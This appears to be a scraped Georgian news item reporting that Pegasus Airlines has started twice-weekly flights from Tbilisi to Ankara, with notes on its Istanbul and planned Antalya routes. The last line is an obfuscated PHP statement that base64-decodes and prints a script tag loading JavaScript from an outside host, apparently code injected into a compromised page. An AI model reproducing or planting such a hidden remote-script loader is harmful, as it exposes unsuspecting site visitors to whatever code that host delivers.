celsiusi
ავერსი საქკაბელი

„პეგასუსის ავიახაზებმა“ თბილისის საერთაშორისო აეროპორტიდან ანკარის მიმართულებით ფრენა დაიწყო.

ახალ მიმართულებაზე ავიაკომპანია კვირაში ორჯერ – ოთხშაბათს და კვირას იფრენს.

აღსანიშნავია, რომ ანკარის მიმართულებით 2019-2020 წლებში თბილისის საერთაშორისო აეროპორტიდან რეისებს „თურქეთის ავიახაზები“ ასრულებდა.

დღეისათვის, „პეგასუსი“ თბილისის საერთაშორისო აეროპორტიდან სტამბოლის მიმართულებით რეისებს კვირაში 17-ჯერ ასრულებს.

ავიაკომპანია ასევე გეგმავს რეგულარული რეისების გაგრძელებას ანტალიის მიმართულებით, პირველად ზამთრის სეზონზე და ფრენებს კვირაში ორჯერ  – ოთხშაბათსა და შაბათს შეასრულებს.

476
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");